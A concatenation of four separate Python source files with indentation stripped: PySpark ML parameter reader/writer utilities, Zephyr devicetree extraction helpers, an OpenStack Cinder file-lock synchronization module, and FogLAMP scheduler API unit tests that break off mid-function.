class JavaMLReader(MLReader):
"""
(Private) Specialization of :py:class:`MLReader` for :py:class:`JavaParams` types
"""
def __init__(self, clazz):
super(JavaMLReader, self).__init__()
self._clazz = clazz
self._jread = self._load_java_obj(clazz).read()
def load(self, path):
"""Load the ML instance from the input path."""
if not isinstance(path, basestring):
raise TypeError("path should be a basestring, got type %s" % type(path))
java_obj = self._jread.load(path)
if not hasattr(self._clazz, "_from_java"):
raise NotImplementedError("This Java ML type cannot be loaded into Python currently: %r"
% self._clazz)
return self._clazz._from_java(java_obj)
def context(self, sqlContext):
"""
Sets the SQL context to use for loading.
.. note:: Deprecated in 2.1 and will be removed in 3.0, use session instead.
"""
warnings.warn(
"Deprecated in 2.1 and will be removed in 3.0, use session instead.",
DeprecationWarning)
self._jread.context(sqlContext._ssql_ctx)
return self
def session(self, sparkSession):
"""Sets the Spark Session to use for loading."""
self._jread.session(sparkSession._jsparkSession)
return self
@classmethod
def _java_loader_class(cls, clazz):
"""
Returns the full class name of the Java ML instance. The default
implementation replaces "pyspark" by "org.apache.spark" in
the Python full class name.
"""
java_package = clazz.__module__.replace("pyspark", "org.apache.spark")
if clazz.__name__ in ("Pipeline", "PipelineModel"):
# Remove the last package name "pipeline" for Pipeline and PipelineModel.
java_package = ".".join(java_package.split(".")[0:-1])
return java_package + "." + clazz.__name__
@classmethod
def _load_java_obj(cls, clazz):
"""Load the peer Java object of the ML instance."""
java_class = cls._java_loader_class(clazz)
java_obj = _jvm()
for name in java_class.split("."):
java_obj = getattr(java_obj, name)
return java_obj
@inherit_doc
class MLReadable(object):
"""
Mixin for instances that provide :py:class:`MLReader`.
.. versionadded:: 2.0.0
"""
@classmethod
def read(cls):
"""Returns an MLReader instance for this class."""
raise NotImplementedError("MLReadable.read() not implemented for type: %r" % cls)
@classmethod
def load(cls, path):
"""Reads an ML instance from the input path, a shortcut of `read().load(path)`."""
return cls.read().load(path)
@inherit_doc
class JavaMLReadable(MLReadable):
"""
(Private) Mixin for instances that provide JavaMLReader.
"""
@classmethod
def read(cls):
"""Returns an MLReader instance for this class."""
return JavaMLReader(cls)
@inherit_doc
class JavaPredictionModel():
"""
(Private) Java Model for prediction tasks (regression and classification).
To be mixed in with class:`pyspark.ml.JavaModel`
"""
@property
@since("2.1.0")
def numFeatures(self):
"""
Returns the number of features the model was trained on. If unknown, returns -1
"""
return self._call_java("numFeatures")
@inherit_doc
class DefaultParamsWritable(MLWritable):
"""
.. note:: DeveloperApi
Helper trait for making simple :py:class:`Params` types writable. If a :py:class:`Params`
class stores all data as :py:class:`Param` values, then extending this trait will provide
a default implementation of writing saved instances of the class.
This only handles simple :py:class:`Param` types; e.g., it will not handle
:py:class:`Dataset`. See :py:class:`DefaultParamsReadable`, the counterpart to this trait.
.. versionadded:: 2.3.0
"""
def write(self):
"""Returns a DefaultParamsWriter instance for this class."""
from pyspark.ml.param import Params
if isinstance(self, Params):
return DefaultParamsWriter(self)
else:
raise TypeError("Cannot use DefautParamsWritable with type %s because it does not " +
" extend Params.", type(self))
@inherit_doc
class DefaultParamsWriter(MLWriter):
"""
.. note:: DeveloperApi
Specialization of :py:class:`MLWriter` for :py:class:`Params` types
Class for writing Estimators and Transformers whose parameters are JSON-serializable.
.. versionadded:: 2.3.0
"""
def __init__(self, instance):
super(DefaultParamsWriter, self).__init__()
self.instance = instance
def saveImpl(self, path):
DefaultParamsWriter.saveMetadata(self.instance, path, self.sc)
@staticmethod
def saveMetadata(instance, path, sc, extraMetadata=None, paramMap=None):
"""
Saves metadata + Params to: path + "/metadata"
- class
- timestamp
- sparkVersion
- uid
- paramMap
- (optionally, extra metadata)
:param extraMetadata: Extra metadata to be saved at same level as uid, paramMap, etc.
:param paramMap: If given, this is saved in the "paramMap" field.
"""
metadataPath = os.path.join(path, "metadata")
metadataJson = DefaultParamsWriter._get_metadata_to_save(instance,
sc,
extraMetadata,
paramMap)
sc.parallelize([metadataJson], 1).saveAsTextFile(metadataPath)
@staticmethod
def _get_metadata_to_save(instance, sc, extraMetadata=None, paramMap=None):
"""
Helper for :py:meth:`DefaultParamsWriter.saveMetadata` which extracts the JSON to save.
This is useful for ensemble models which need to save metadata for many sub-models.
.. note:: :py:meth:`DefaultParamsWriter.saveMetadata` for details on what this includes.
"""
uid = instance.uid
cls = instance.__module__ + '.' + instance.__class__.__name__
params = instance.extractParamMap()
jsonParams = {}
if paramMap is not None:
jsonParams = paramMap
else:
for p in params:
jsonParams[p.name] = params[p]
basicMetadata = {"class": cls, "timestamp": long(round(time.time() * 1000)),
"sparkVersion": sc.version, "uid": uid, "paramMap": jsonParams}
if extraMetadata is not None:
basicMetadata.update(extraMetadata)
return json.dumps(basicMetadata, separators=[',', ':'])
@inherit_doc
class DefaultParamsReadable(MLReadable):
"""
.. note:: DeveloperApi
Helper trait for making simple :py:class:`Params` types readable.
If a :py:class:`Params` class stores all data as :py:class:`Param` values,
then extending this trait will provide a default implementation of reading saved
instances of the class. This only handles simple :py:class:`Param` types;
e.g., it will not handle :py:class:`Dataset`. See :py:class:`DefaultParamsWritable`,
the counterpart to this trait.
.. versionadded:: 2.3.0
"""
@classmethod
def read(cls):
"""Returns a DefaultParamsReader instance for this class."""
return DefaultParamsReader(cls)
@inherit_doc
class DefaultParamsReader(MLReader):
"""
.. note:: DeveloperApi
Specialization of :py:class:`MLReader` for :py:class:`Params` types
Default :py:class:`MLReader` implementation for transformers and estimators that
contain basic (json-serializable) params and no data. This will not handle
more complex params or types with data (e.g., models with coefficients).
.. versionadded:: 2.3.0
"""
def __init__(self, cls):
super(DefaultParamsReader, self).__init__()
self.cls = cls
@staticmethod
def __get_class(clazz):
"""
Loads Python class from its name.
"""
parts = clazz.split('.')
module = ".".join(parts[:-1])
m = __import__(module)
for comp in parts[1:]:
m = getattr(m, comp)
return m
def load(self, path):
metadata = DefaultParamsReader.loadMetadata(path, self.sc)
py_type = DefaultParamsReader.__get_class(metadata['class'])
instance = py_type()
instance._resetUid(metadata['uid'])
DefaultParamsReader.getAndSetParams(instance, metadata)
return instance
@staticmethod
def loadMetadata(path, sc, expectedClassName=""):
"""
Load metadata saved using :py:meth:`DefaultParamsWriter.saveMetadata`
:param expectedClassName: If non empty, this is checked against the loaded metadata.
"""
metadataPath = os.path.join(path, "metadata")
metadataStr = sc.textFile(metadataPath, 1).first()
loadedVals = DefaultParamsReader._parseMetaData(metadataStr, expectedClassName)
return loadedVals
@staticmethod
def _parseMetaData(metadataStr, expectedClassName=""):
"""
Parse metadata JSON string produced by :py:meth`DefaultParamsWriter._get_metadata_to_save`.
This is a helper function for :py:meth:`DefaultParamsReader.loadMetadata`.
:param metadataStr: JSON string of metadata
:param expectedClassName: If non empty, this is checked against the loaded metadata.
"""
metadata = json.loads(metadataStr)
className = metadata['class']
if len(expectedClassName) > 0:
assert className == expectedClassName, "Error loading metadata: Expected " + \
"class name {} but found class name {}".format(expectedClassName, className)
return metadata
@staticmethod
def getAndSetParams(instance, metadata):
"""
Extract Params from metadata, and set them in the instance.
"""
for paramName in metadata['paramMap']:
param = instance.getParam(paramName)
paramValue = metadata['paramMap'][paramName]
instance.set(param, paramValue)
@staticmethod
def loadParamsInstance(path, sc):
"""
Load a :py:class:`Params` instance from the given path, and return it.
This assumes the instance inherits from :py:class:`MLReadable`.
"""
metadata = DefaultParamsReader.loadMetadata(path, sc)
pythonClassName = metadata['class'].replace("org.apache.spark", "pyspark")
py_type = DefaultParamsReader.__get_class(pythonClassName)
instance = py_type.load(path)
return instance
|
|
#
# Copyright (c) 2017 Linaro
# Copyright (c) 2017 Bobby Noelte
#
# SPDX-License-Identifier: Apache-2.0
#
from collections import defaultdict
from copy import deepcopy
# globals
phandles = {}
aliases = defaultdict(list)
chosen = {}
reduced = {}
defs = {}
structs = {}
bindings = {}
bus_bindings = {}
bindings_compat = []
old_alias_names = False
regs_config = {
'zephyr,flash' : 'CONFIG_FLASH',
'zephyr,sram' : 'CONFIG_SRAM',
'zephyr,ccm' : 'CONFIG_CCM'
}
name_config = {
'zephyr,console' : 'CONFIG_UART_CONSOLE_ON_DEV_NAME',
'zephyr,shell-uart' : 'CONFIG_UART_SHELL_ON_DEV_NAME',
'zephyr,bt-uart' : 'CONFIG_BT_UART_ON_DEV_NAME',
'zephyr,uart-pipe' : 'CONFIG_UART_PIPE_ON_DEV_NAME',
'zephyr,bt-mon-uart' : 'CONFIG_BT_MONITOR_ON_DEV_NAME',
'zephyr,uart-mcumgr' : 'CONFIG_UART_MCUMGR_ON_DEV_NAME'
}
def convert_string_to_label(s):
# Transmute ,-@/ to _
s = s.replace("-", "_")
s = s.replace(",", "_")
s = s.replace("@", "_")
s = s.replace("/", "_")
# Uppercase the string
s = s.upper()
return s
def get_all_compatibles(d, name, comp_dict):
if 'props' in d:
compat = d['props'].get('compatible')
enabled = d['props'].get('status')
if enabled == "disabled":
return comp_dict
if compat is not None:
comp_dict[name] = compat
if name != '/':
name += '/'
if isinstance(d, dict):
if d['children']:
for k, v in d['children'].items():
get_all_compatibles(v, name + k, comp_dict)
return comp_dict
def get_aliases(root):
if 'children' in root:
if 'aliases' in root['children']:
for k, v in root['children']['aliases']['props'].items():
aliases[v].append(k)
# Treat alternate names as aliases
for k in reduced.keys():
if reduced[k].get('alt_name', None) is not None:
aliases[k].append(reduced[k]['alt_name'])
def get_node_compats(node_address):
compat = None
try:
if 'props' in reduced[node_address].keys():
compat = reduced[node_address]['props'].get('compatible')
if not isinstance(compat, list):
compat = [compat, ]
except:
pass
return compat
def get_compat(node_address):
compat = None
try:
if 'props' in reduced[node_address].keys():
compat = reduced[node_address]['props'].get('compatible')
if compat == None:
compat = find_parent_prop(node_address, 'compatible')
if isinstance(compat, list):
compat = compat[0]
except:
pass
return compat
def get_chosen(root):
if 'children' in root:
if 'chosen' in root['children']:
for k, v in root['children']['chosen']['props'].items():
chosen[k] = v
def get_phandles(root, name, handles):
if 'props' in root:
handle = root['props'].get('phandle')
enabled = root['props'].get('status')
if enabled == "disabled":
return
if handle is not None:
phandles[handle] = name
if name != '/':
name += '/'
if isinstance(root, dict):
if root['children']:
for k, v in root['children'].items():
get_phandles(v, name + k, handles)
def insert_defs(node_address, new_defs, new_aliases):
for key in new_defs.keys():
if key.startswith('DT_COMPAT_'):
node_address = 'compatibles'
if node_address in defs:
if 'aliases' in defs[node_address]:
defs[node_address]['aliases'].update(new_aliases)
else:
defs[node_address]['aliases'] = new_aliases
defs[node_address].update(new_defs)
else:
new_defs['aliases'] = new_aliases
defs[node_address] = new_defs
def find_node_by_path(nodes, path):
d = nodes
for k in path[1:].split('/'):
d = d['children'][k]
return d
def get_reduced(nodes, path):
# compress nodes list to nodes w/ paths, add interrupt parent
if 'props' in nodes:
status = nodes['props'].get('status')
if status == "disabled":
return
if isinstance(nodes, dict):
reduced[path] = dict(nodes)
reduced[path].pop('children', None)
if path != '/':
path += '/'
if nodes['children']:
for k, v in nodes['children'].items():
get_reduced(v, path + k)
def get_node_label(node_address):
node_compat = get_compat(node_address)
def_label = convert_string_to_label(node_compat)
if '@' in node_address:
# See if we have number we can convert
try:
unit_addr = int(node_address.split('@')[-1], 16)
(nr_addr_cells, nr_size_cells) = get_addr_size_cells(node_address)
unit_addr += translate_addr(unit_addr, node_address,
nr_addr_cells, nr_size_cells)
unit_addr = "%x" % unit_addr
except:
unit_addr = node_address.split('@')[-1]
def_label += '_' + convert_string_to_label(unit_addr)
else:
def_label += '_' + \
convert_string_to_label(node_address.split('/')[-1])
return def_label
def get_parent_address(node_address):
parent_address = ''
for comp in node_address.split('/')[1:-1]:
parent_address += '/' + comp
return parent_address
def find_parent_prop(node_address, prop):
parent_address = get_parent_address(node_address)
if prop in reduced[parent_address]['props']:
parent_prop = reduced[parent_address]['props'].get(prop)
else:
raise Exception("Parent of node " + node_address +
" has no " + prop + " property")
return parent_prop
# Get the #{address,size}-cells for a given node
def get_addr_size_cells(node_address):
parent_addr = get_parent_address(node_address)
if parent_addr == '':
parent_addr = '/'
# The DT spec says that if #address-cells is missing default to 2
# if #size-cells is missing default to 1
nr_addr = reduced[parent_addr]['props'].get('#address-cells', 2)
nr_size = reduced[parent_addr]['props'].get('#size-cells', 1)
return (nr_addr, nr_size)
def translate_addr(addr, node_address, nr_addr_cells, nr_size_cells):
try:
ranges = deepcopy(find_parent_prop(node_address, 'ranges'))
if type(ranges) is not list: ranges = [ ]
except:
return 0
parent_address = get_parent_address(node_address)
(nr_p_addr_cells, nr_p_size_cells) = get_addr_size_cells(parent_address)
range_offset = 0
while ranges:
child_bus_addr = 0
parent_bus_addr = 0
range_len = 0
for x in range(nr_addr_cells):
val = ranges.pop(0) << (32 * (nr_addr_cells - x - 1))
child_bus_addr += val
for x in range(nr_p_addr_cells):
val = ranges.pop(0) << (32 * (nr_p_addr_cells - x - 1))
parent_bus_addr += val
for x in range(nr_size_cells):
range_len += ranges.pop(0) << (32 * (nr_size_cells - x - 1))
# if we are outside of the range we don't need to translate
if child_bus_addr <= addr <= (child_bus_addr + range_len):
range_offset = parent_bus_addr - child_bus_addr
break
parent_range_offset = translate_addr(addr + range_offset,
parent_address, nr_p_addr_cells, nr_p_size_cells)
range_offset += parent_range_offset
return range_offset
def enable_old_alias_names(enable):
global old_alias_names
old_alias_names = enable
def add_prop_aliases(node_address,
alias_label_function, prop_label, prop_aliases):
node_compat = get_compat(node_address)
new_alias_prefix = 'DT_' + convert_string_to_label(node_compat)
for alias in aliases[node_address]:
old_alias_label = alias_label_function(alias)
new_alias_label = new_alias_prefix + '_' + old_alias_label
if (new_alias_label != prop_label):
prop_aliases[new_alias_label] = prop_label
if (old_alias_names and old_alias_label != prop_label):
prop_aliases[old_alias_label] = prop_label
def get_binding(node_address):
compat = get_compat(node_address)
# For just look for the binding in the main dict
# if we find it here, return it, otherwise it best
# be in the bus specific dict
if compat in bindings:
return bindings[compat]
parent_addr = get_parent_address(node_address)
parent_compat = get_compat(parent_addr)
parent_binding = bindings[parent_compat]
bus = parent_binding['child']['bus']
binding = bus_bindings[bus][compat]
return binding
def get_binding_compats():
return bindings_compat
|
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2011 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import errno
import functools
import os
import shutil
import tempfile
import time
import weakref
from eventlet import semaphore
from oslo.config import cfg
from cinder.openstack.common import fileutils
from cinder.openstack.common.gettextutils import _
from cinder.openstack.common import local
from cinder.openstack.common import log as logging
LOG = logging.getLogger(__name__)
util_opts = [
cfg.BoolOpt('disable_process_locking', default=False,
help='Whether to disable inter-process locks'),
cfg.StrOpt('lock_path',
help=('Directory to use for lock files. Default to a '
'temp directory'))
]
CONF = cfg.CONF
CONF.register_opts(util_opts)
def set_defaults(lock_path):
cfg.set_defaults(util_opts, lock_path=lock_path)
class _InterProcessLock(object):
"""Lock implementation which allows multiple locks, working around
issues like bugs.debian.org/cgi-bin/bugreport.cgi?bug=632857 and does
not require any cleanup. Since the lock is always held on a file
descriptor rather than outside of the process, the lock gets dropped
automatically if the process crashes, even if __exit__ is not executed.
There are no guarantees regarding usage by multiple green threads in a
single process here. This lock works only between processes. Exclusive
access between local threads should be achieved using the semaphores
in the @synchronized decorator.
Note these locks are released when the descriptor is closed, so it's not
safe to close the file descriptor while another green thread holds the
lock. Just opening and closing the lock file can break synchronisation,
so lock files must be accessed only using this abstraction.
"""
def __init__(self, name):
self.lockfile = None
self.fname = name
def __enter__(self):
self.lockfile = open(self.fname, 'w')
while True:
try:
# Using non-blocking locks since green threads are not
# patched to deal with blocking locking calls.
# Also upon reading the MSDN docs for locking(), it seems
# to have a laughable 10 attempts "blocking" mechanism.
self.trylock()
return self
except IOError as e:
if e.errno in (errno.EACCES, errno.EAGAIN):
# external locks synchronise things like iptables
# updates - give it some time to prevent busy spinning
time.sleep(0.01)
else:
raise
def __exit__(self, exc_type, exc_val, exc_tb):
try:
self.unlock()
self.lockfile.close()
except IOError:
LOG.exception(_("Could not release the acquired lock `%s`"),
self.fname)
def trylock(self):
raise NotImplementedError()
def unlock(self):
raise NotImplementedError()
class _WindowsLock(_InterProcessLock):
def trylock(self):
msvcrt.locking(self.lockfile.fileno(), msvcrt.LK_NBLCK, 1)
def unlock(self):
msvcrt.locking(self.lockfile.fileno(), msvcrt.LK_UNLCK, 1)
class _PosixLock(_InterProcessLock):
def trylock(self):
fcntl.lockf(self.lockfile, fcntl.LOCK_EX | fcntl.LOCK_NB)
def unlock(self):
fcntl.lockf(self.lockfile, fcntl.LOCK_UN)
if os.name == 'nt':
import msvcrt
InterProcessLock = _WindowsLock
else:
import fcntl
InterProcessLock = _PosixLock
_semaphores = weakref.WeakValueDictionary()
def synchronized(name, lock_file_prefix, external=False, lock_path=None):
"""Synchronization decorator.
Decorating a method like so::
@synchronized('mylock')
def foo(self, *args):
...
ensures that only one thread will execute the foo method at a time.
Different methods can share the same lock::
@synchronized('mylock')
def foo(self, *args):
...
@synchronized('mylock')
def bar(self, *args):
...
This way only one of either foo or bar can be executing at a time.
:param lock_file_prefix: The lock_file_prefix argument is used to provide
lock files on disk with a meaningful prefix. The prefix should end with a
hyphen ('-') if specified.
:param external: The external keyword argument denotes whether this lock
should work across multiple processes. This means that if two different
workers both run a a method decorated with @synchronized('mylock',
external=True), only one of them will execute at a time.
:param lock_path: The lock_path keyword argument is used to specify a
special location for external lock files to live. If nothing is set, then
CONF.lock_path is used as a default.
"""
def wrap(f):
@functools.wraps(f)
def inner(*args, **kwargs):
# NOTE(soren): If we ever go natively threaded, this will be racy.
# See http://stackoverflow.com/questions/5390569/dyn
# amically-allocating-and-destroying-mutexes
sem = _semaphores.get(name, semaphore.Semaphore())
if name not in _semaphores:
# this check is not racy - we're already holding ref locally
# so GC won't remove the item and there was no IO switch
# (only valid in greenthreads)
_semaphores[name] = sem
with sem:
LOG.debug(_('Got semaphore "%(lock)s" for method '
'"%(method)s"...'), {'lock': name,
'method': f.__name__})
# NOTE(mikal): I know this looks odd
if not hasattr(local.strong_store, 'locks_held'):
local.strong_store.locks_held = []
local.strong_store.locks_held.append(name)
try:
if external and not CONF.disable_process_locking:
LOG.debug(_('Attempting to grab file lock "%(lock)s" '
'for method "%(method)s"...'),
{'lock': name, 'method': f.__name__})
cleanup_dir = False
# We need a copy of lock_path because it is non-local
local_lock_path = lock_path
if not local_lock_path:
local_lock_path = CONF.lock_path
if not local_lock_path:
cleanup_dir = True
local_lock_path = tempfile.mkdtemp()
if not os.path.exists(local_lock_path):
fileutils.ensure_tree(local_lock_path)
# NOTE(mikal): the lock name cannot contain directory
# separators
safe_name = name.replace(os.sep, '_')
lock_file_name = '%s%s' % (lock_file_prefix, safe_name)
lock_file_path = os.path.join(local_lock_path,
lock_file_name)
try:
lock = InterProcessLock(lock_file_path)
with lock:
LOG.debug(_('Got file lock "%(lock)s" at '
'%(path)s for method '
'"%(method)s"...'),
{'lock': name,
'path': lock_file_path,
'method': f.__name__})
retval = f(*args, **kwargs)
finally:
LOG.debug(_('Released file lock "%(lock)s" at '
'%(path)s for method "%(method)s"...'),
{'lock': name,
'path': lock_file_path,
'method': f.__name__})
# NOTE(vish): This removes the tempdir if we needed
# to create one. This is used to
# cleanup the locks left behind by unit
# tests.
if cleanup_dir:
shutil.rmtree(local_lock_path)
else:
retval = f(*args, **kwargs)
finally:
local.strong_store.locks_held.remove(name)
return retval
return inner
return wrap
def synchronized_with_prefix(lock_file_prefix):
"""Partial object generator for the synchronization decorator.
Redefine @synchronized in each project like so::
(in nova/utils.py)
from nova.openstack.common import lockutils
synchronized = lockutils.synchronized_with_prefix('nova-')
(in nova/foo.py)
from nova import utils
@utils.synchronized('mylock')
def bar(self, *args):
...
The lock_file_prefix argument is used to provide lock files on disk with a
meaningful prefix. The prefix should end with a hyphen ('-') if specified.
"""
return functools.partial(synchronized, lock_file_prefix=lock_file_prefix)
|
|
# -*- coding: utf-8 -*-
# FOGLAMP_BEGIN
# See: http://foglamp.readthedocs.io/
# FOGLAMP_END
import asyncio
import json
from unittest.mock import MagicMock, patch, call
from datetime import timedelta, datetime
import uuid
import pytest
from aiohttp import web
from foglamp.services.core import routes
from foglamp.services.core import connect
from foglamp.common.storage_client.storage_client import StorageClientAsync
from foglamp.services.core import server
from foglamp.services.core.scheduler.scheduler import Scheduler
from foglamp.services.core.scheduler.entities import ScheduledProcess, Task, IntervalSchedule, TimedSchedule, StartUpSchedule, ManualSchedule
from foglamp.services.core.scheduler.exceptions import *
__author__ = "Vaibhav Singhal"
__copyright__ = "Copyright (c) 2017 OSIsoft, LLC"
__license__ = "Apache 2.0"
__version__ = "${VERSION}"
@asyncio.coroutine
def mock_coro_response(*args, **kwargs):
if len(args) > 0:
return args[0]
else:
return ""
@pytest.allure.feature("unit")
@pytest.allure.story("core", "api", "schedule")
class TestScheduledProcesses:
@pytest.fixture
def client(self, loop, test_client):
app = web.Application(loop=loop)
# fill the routes table
routes.setup(app)
return loop.run_until_complete(test_client(app))
def setup_method(self):
server.Server.scheduler = Scheduler(None, None)
def teardown_method(self):
server.Server.scheduler = None
async def test_get_scheduled_processes(self, client):
async def mock_coro():
processes = []
process = ScheduledProcess()
process.name = "foo"
process.script = "bar"
processes.append(process)
return processes
with patch.object(server.Server.scheduler, 'get_scheduled_processes', return_value=mock_coro()):
resp = await client.get('/foglamp/schedule/process')
assert 200 == resp.status
result = await resp.text()
json_response = json.loads(result)
assert {'processes': ['foo']} == json_response
async def test_get_scheduled_process(self, client):
storage_client_mock = MagicMock(StorageClientAsync)
payload = '{"return": ["name"], "where": {"column": "name", "condition": "in", "value": ["purge"]}}'
response = {'rows': [{'name': 'purge'}], 'count': 1}
with patch.object(connect, 'get_storage_async', return_value=storage_client_mock):
with patch.object(storage_client_mock, 'query_tbl_with_payload',
return_value=mock_coro_response(response)) as mock_storage_call:
resp = await client.get('/foglamp/schedule/process/purge')
assert 200 == resp.status
result = await resp.text()
json_response = json.loads(result)
assert 'purge' == json_response
mock_storage_call.assert_called_with('scheduled_processes', payload)
async def test_get_scheduled_process_bad_data(self, client):
storage_client_mock = MagicMock(StorageClientAsync)
response = {'rows': [], 'count': 0}
with patch.object(connect, 'get_storage_async', return_value=storage_client_mock):
with patch.object(storage_client_mock, 'query_tbl_with_payload',
return_value=mock_coro_response(response)):
resp = await client.get('/foglamp/schedule/process/bla')
assert 404 == resp.status
assert "No such Scheduled Process: ['bla']." == resp.reason
class TestSchedules:
_random_uuid = uuid.uuid4()
@pytest.fixture
def client(self, loop, test_client):
app = web.Application(loop=loop)
# fill the routes table
routes.setup(app)
return loop.run_until_complete(test_client(app))
def setup_method(self):
server.Server.scheduler = Scheduler(None, None)
def teardown_method(self):
server.Server.scheduler = None
async def test_get_schedules(self, client):
async def mock_coro():
schedules = []
schedule = StartUpSchedule()
schedule.schedule_id = "1"
schedule.exclusive = True
schedule.enabled = True
schedule.name = "foo"
schedule.process_name = "bar"
schedule.repeat = timedelta(seconds=30)
schedule.time = None
schedule.day = None
schedules.append(schedule)
return schedules
with patch.object(server.Server.scheduler, 'get_schedules', return_value=mock_coro()):
resp = await client.get('/foglamp/schedule')
assert 200 == resp.status
result = await resp.text()
json_response = json.loads(result)
assert {'schedules': [
{'name': 'foo', 'day': None, 'type': 'STARTUP', 'processName': 'bar',
'time': 0, 'id': '1', 'exclusive': True, 'enabled': True, 'repeat': 30.0}
]} == json_response
async def test_get_schedule(self, client):
async def mock_coro():
schedule = StartUpSchedule()
schedule.schedule_id = self._random_uuid
schedule.exclusive = True
schedule.enabled = True
schedule.name = "foo"
schedule.process_name = "bar"
schedule.repeat = timedelta(seconds=30)
schedule.time = None
schedule.day = None
return schedule
with patch.object(server.Server.scheduler, 'get_schedule', return_value=mock_coro()):
resp = await client.get('/foglamp/schedule/{}'.format(self._random_uuid))
assert 200 == resp.status
result = await resp.text()
json_response = json.loads(result)
assert {'id': str(self._random_uuid),
'name': 'foo', 'repeat': 30.0, 'enabled': True,
'processName': 'bar', 'type': 'STARTUP', 'day': None,
'time': 0, 'exclusive': True} == json_response
async def test_get_schedule_bad_data(self, client):
resp = await client.get('/foglamp/schedule/{}'.format("bla"))
assert 404 == resp.status
assert 'Invalid Schedule ID bla' == resp.reason
@pytest.mark.parametrize("exception_name, response_code, response_message", [
(ScheduleNotFoundError(_random_uuid), 404, 'Schedule not found: {}'.format(_random_uuid)),
(ValueError, 404, ''),
])
async def test_get_schedule_exceptions(self, client, exception_name, response_code, response_message):
with patch.object(server.Server.scheduler, 'get_schedule', side_effect=exception_name):
resp = await client.get('/foglamp/schedule/{}'.format(self._random_uuid))
assert response_code == resp.status
assert response_message == resp.reason
async def test_enable_schedule(self, client):
async def mock_coro():
return True, "Schedule successfully enabled"
with patch.object(server.Server.scheduler, 'enable_schedule', return_value=mock_coro()):
resp = await client.put('/foglamp/schedule/{}/enable'.format(self._random_uuid))
assert 200 == resp.status
result = await resp.text()
json_response = json.loads(result)
assert {'status': True, 'message': 'Schedule successfully enabled',
'scheduleId': '{}'.format(self._random_uuid)} == json_response
async def test_enable_schedule_bad_data(self, client):
resp = await client.put('/foglamp/schedule/{}/enable'.format("bla"))
assert 404 == resp.status
assert 'Invalid Schedule ID bla' == resp.reason
@pytest.mark.parametrize("exception_name, response_code, response_message", [
(ScheduleNotFoundError(_random_uuid), 404, 'Schedule not found: {}'.format(_random_uuid)),
(ValueError, 404, ''),
])
async def test_enable_schedule_exceptions(self, client, exception_name, response_code, response_message):
with patch.object(server.Server.scheduler, 'enable_schedule', side_effect=exception_name):
resp = await client.put('/foglamp/schedule/{}/enable'.format(self._random_uuid))
assert response_code == resp.status
assert response_message == resp.reason
async def test_disable_schedule(self, client):
async def mock_coro():
return True, "Schedule successfully disabled"
with patch.object(server.Server.scheduler, 'disable_schedule', return_value=mock_coro()):
resp = await client.put('/foglamp/schedule/{}/disable'.format(self._random_uuid))
assert 200 == resp.status
result = await resp.text()
json_response = json.loads(result)
assert {'status': True, 'message': 'Schedule successfully disabled',
'scheduleId': '{}'.format(self._random_uuid)} == json_response
async def test_disable_schedule_bad_data(self, client):
resp = await client.put('/foglamp/schedule/{}/disable'.format("bla"))
assert 404 == resp.status
assert 'Invalid Schedule ID bla' == resp.reason
@pytest.mark.parametrize("exception_name, response_code, response_message", [
(ScheduleNotFoundError(_random_uuid), 404, 'Schedule not found: {}'.format(_random_uuid)),
(ValueError, 404, ''),
])
async def test_disable_schedule_exceptions(self, client, exception_name, response_code, response_message):
with patch.object(server.Server.scheduler, 'disable_schedule', side_effect=exception_name):
resp = await client.put('/foglamp/schedule/{}/disable'.format(self._random_uuid))
assert response_code == resp.status
assert response_message == resp.reason
@pytest.mark.parametrize("return_queue_task, expected_response", [
(True, {'message': 'Schedule started successfully', 'id': '{}'.format(_random_uuid)}),
(False, {'message': 'Schedule could not be started', 'id': '{}'.format(_random_uuid)}),
])
async def test_start_schedule(self, client, return_queue_task, expected_response):
async def mock_coro():
return ""
async def patch_queue_task(_resp):
return _resp
with patch.object(server.Server.scheduler, 'get_schedule', return_value=mock_coro()) as mock_get_schedule:
with patch.object(server.Server.scheduler, 'queue_task', return_value=patch_queue_task(return_queue_task)) \
as mock_queue_task:
resp = await client.post('/foglamp/schedule/start/{}'.format(self._random_uuid))
assert 200 == resp.status
result = await resp.text()
json_response = json.loads(result)
assert expected_response == json_response
mock_queue_task.assert_called_once_with(uuid.UUID('{}'.format(self._random_uuid)))
mock_get_schedule.assert_called_once_with(uuid.UUID('{}'.format(self._random_uuid)))
async def test_start_schedule_bad_data(self, client):
resp = await client.post('/foglamp/schedule/start/{}'.format("bla"))
assert 404 == resp.status
assert 'Invalid Schedule ID bla' == resp.reason
@pytest.mark.parametrize("exception_name, response_code, response_message", [
(ScheduleNotFoundError(_random_uuid), 404, 'Schedule not found: {}'.format(_random_uuid)),
(NotReadyError(), 404, ''),
(ValueError, 404, ''),
])
async def test_start_schedule_exceptions(self, client, exception_name, response_code, response_message):
with patch.object(server.Server.scheduler, 'get_schedule', side_effect=exception_name):
resp = await client.post('/foglamp/schedule/start/{}'.format(self._random_uuid))
assert response_code == resp.status
assert response_message == resp.reason
@pytest.mark.parametrize("request_data, expected_response", [
({"type": 1, "name": "foo", "process_name": "bar"},
{'schedule': {'type': 'STARTUP', 'day': None, 'name': 'foo', 'exclusive': True, 'enabled': True,
'id': '{}'.format(_random_uuid), 'processName': 'bar', 'time': 0, 'repeat': 0}}),
({"type": 2, "day": 1, "time": 10, "name": "foo", "process_name": "bar"},
{'schedule': {'name': 'foo', 'processName': 'bar', 'time': 10, 'enabled': True,
'id': '{}'.format(_random_uuid), 'repeat': 0, 'exclusive': True, 'day': 1,
'type': 'TIMED'}}),
({"type": 3, "repeat": 15, "name": "foo", "process_name": "bar"},
{'schedule': {'day': None, 'type': 'INTERVAL', 'exclusive': True, 'enabled': True, 'time': 0, 'repeat': 15.0,
'name': 'foo', 'id': '{}'.format(_random_uuid), 'processName': 'bar'}}),
({"type": 4, "name": "foo", "process_name": "bar"},
{'schedule': {'day': None, 'enabled': True, 'repeat': 0, 'id': '{}'.format(_random_uuid),
'type': 'MANUAL', 'name': 'foo', 'exclusive': True, 'processName': 'bar', 'time': 0}}),
])
async def test_post_schedule(self, client, request_data, expected_response):
async def mock_coro():
return ""
async def mock_schedule(_type):
if _type == 1:
schedule = StartUpSchedule()
schedule.repeat = None
schedule.time = None
schedule.day = None
